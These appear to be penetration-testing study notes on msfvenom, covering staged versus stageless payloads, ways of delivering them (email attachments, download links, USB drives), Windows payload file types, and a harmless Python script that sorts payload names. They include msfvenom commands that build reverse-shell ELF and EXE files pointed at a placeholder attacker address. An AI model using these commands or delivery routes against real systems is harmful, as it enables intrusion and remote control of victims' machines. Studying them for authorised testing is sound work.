MSFvenom

// List all available payloads
msfvenom -l payloads

Staged Payloads

  • Create a way for us to send over more components of our attack; think of it like "setting the stage" for something more useful (for example: linux/x86/shell/reverse_tcp)

  • Keep in mind that a stage also takes up space in memory, which leaves less space for the payload.

Stageless Payloads

  • Do not have a stage (for example: linux/zarch/meterpreter_reverse_tcp)

  • These can be useful when we do not have much bandwidth or when latency could interfere with the staging

  • These can be more stable than staged payloads

  • Can be better for evasion purposes because less traffic passes over the network to execute the payload.
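Whether a payload is staged or stageless is visible in its name: a staged payload separates the stage from the stager with a slash (shell/reverse_tcp), a stageless one joins them with an underscore (shell_reverse_tcp). The following Python script, added here as an example and not part of the original notes, parses `msfvenom -l payloads`-style output and sorts each name into staged, stageless or single. The listing embedded in it is constructed sample text, not real msfvenom output, and the set of stage names it recognises is an assumption kept short for illustration.

```python
import re
import sys
from collections import defaultdict

# Assumption: a short, illustrative set of Metasploit stage names.
# The real framework has more; extend this set for a full listing.
STAGES = {"shell", "meterpreter", "vncinject", "dllinject", "powershell", "custom", "pingback"}

# A stager component: reverse_tcp, bind_tcp, reverse_https, ...
STAGER_RE = re.compile(r"^(reverse|bind)_[a-z0-9_]+$")

# Constructed sample in the shape of `msfvenom -l payloads` output (not real output).
SAMPLE_LISTING = """\
Framework Payloads (6 total) [--payload <value>]
================================================

    Name                                 Description
    ----                                 -----------
    cmd/unix/reverse_bash                Interactive shell via bash's builtin /dev/tcp
    linux/x64/shell/reverse_tcp          Spawn a command shell (staged), connect back
    linux/x64/shell_reverse_tcp          Connect back and spawn a command shell
    linux/zarch/meterpreter_reverse_tcp  Meterpreter server on Linux, connect back
    windows/shell/bind_tcp               Spawn a piped command shell (staged), listen
    windows/shell_reverse_tcp            Connect back and spawn a command shell
"""


def parse_listing(text):
    """Return the payload names (first column) from a listing; header rows have no '/'."""
    names = []
    for line in text.splitlines():
        tokens = line.split()
        if tokens and "/" in tokens[0]:
            names.append(tokens[0])
    return names


def classify(name):
    """Classify a payload name as 'staged', 'stageless' or 'single' by its naming convention."""
    parts = name.split("/")
    last = parts[-1]
    prev = parts[-2] if len(parts) >= 2 else ""
    # stage/stager as separate path components -> staged (e.g. shell/reverse_tcp)
    if prev in STAGES and STAGER_RE.match(last):
        return "staged"
    # stage_stager joined by underscore -> stageless (e.g. shell_reverse_tcp)
    stage, _, rest = last.partition("_")
    if stage in STAGES and STAGER_RE.match(rest):
        return "stageless"
    # everything else (exec, reverse_bash, ...) is a single, self-contained payload
    return "single"


def summarize(text):
    """Group all payload names in a listing by their classification."""
    buckets = defaultdict(list)
    for name in parse_listing(text):
        buckets[classify(name)].append(name)
    return dict(buckets)


if __name__ == "__main__":
    # Pipe real output in with `msfvenom -l payloads | python3 classify.py`,
    # otherwise fall back to the constructed sample above.
    listing = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LISTING
    for kind, names in sorted(summarize(listing).items()):
        print(f"{kind} ({len(names)}):")
        for name in names:
            print(f"  {name}")
```

Running it against a real `msfvenom -l payloads` listing gives a quick count of how many payloads in a given target family need a second network round trip (the staged ones), which is the traffic pattern the stageless bullets above are describing.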

Common ways to deliver the stageless payloads

  • Email with file attached

  • Download link on a website

  • Combined with a Metasploit exploit module (requires us to be on the internal network)

  • USB drive

Example Stageless Payloads

// .elf file
msfvenom -p linux/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f elf > FILE_NAME.elf

// .exe file
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f exe > FILE_NAME.exe

Payload Types to Consider

DLLs

  • A library used on Microsoft Windows to provide shared code and data that can be used by many different programs at once.

  • Covered more in depth here - DLLs

Batch

  • Batch files are plain-text DOS scripts used to complete multiple tasks through the CLI

  • End with extension of .bat

VBS

  • VBScript is a lightweight scripting language based on Microsoft's Visual Basic.

  • Historically used as a client-side scripting language on web pages to enable dynamic content.

  • Dated and disabled by most modern web browsers, but can still be used in the context of phishing and other attacks aimed at having users perform an action such as enabling macros in an Excel document.

MSI

  • .MSI files serve as an installation database for the Windows installer.

  • The installer reads the .msi file to understand all the components needed and how to find them.

PowerShell

  • PowerShell is both a shell and a scripting language
